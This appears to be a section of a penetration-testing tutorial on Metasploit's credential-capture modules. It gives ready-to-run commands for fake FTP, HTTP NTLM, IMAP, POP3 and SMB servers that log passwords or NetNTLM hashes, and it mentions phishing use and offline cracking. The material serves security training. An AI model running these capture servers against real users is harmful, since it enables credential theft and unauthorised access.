Discovery

The discovery stage follows the reconnaissance stage of a penetration test: the information gathered passively there is used to actively collect usernames, passwords and other sensitive data. Metasploit is well suited to a continuous engagement because what one stage produces (hosts, services, credentials) is stored in its database and is available to the modules used in the next stage, without having to manually feed or pass the information gathered in each stage.

Credentials Capture

The credential capture modules gather usernames and passwords by hosting an imitation server that accepts connections from a user or service and logs whatever it receives to the console and, optionally, to a file. This works against automated systems (clients with saved credentials that reconnect on their own) and in phishing campaigns, where the target user or system is made to connect to the Metasploit-hosted service. Metasploit can host the following services with these commands,

FTP

use auxiliary/server/capture/ftp
run

Once the user logs in the credentials will be printed on the screen.

HTTP

The HTTP NTLM module presents an HTTP server that demands NTLM authentication and captures the client's NTLM/LM challenge-response (NetNTLMv1/v2) when it authenticates,

use auxiliary/server/capture/http_ntlm
set LOGFILE captured_hashes.txt
set SRVPORT 80
set URIPATH /
run

Here we have set some of the parameters: the file in which to store the captured hashes, the port to listen on and the URI path. These are optional; show options lists the others.

IMAP

The IMAP module collects the user's mail credentials (an IMAP LOGIN sends them in cleartext),

use auxiliary/server/capture/imap
run

POP3

The POP3 module collects user mail credentials,

use auxiliary/server/capture/pop3
run

SMB

The SMB module hosts a fake SMB server and captures the NTLM challenge-response hashes (NetNTLMv1/v2) of any user or service that tries to connect to the share.

use auxiliary/server/capture/smb
set JOHNPWFILE /tmp/smbhashes.txt
run

The captured challenge-responses are appended, in John the Ripper's format, to the file named by JOHNPWFILE (with a _netntlm or _netntlmv2 suffix depending on what the client sent) and can be cracked offline with John or hashcat. Note that these are challenge-responses, not the NT hash itself: they can be cracked against a wordlist but cannot be replayed as pass-the-hash. The module uses a fixed challenge by default (the CHALLENGE option), which is what makes NetNTLMv1 responses attackable with precomputed tables.
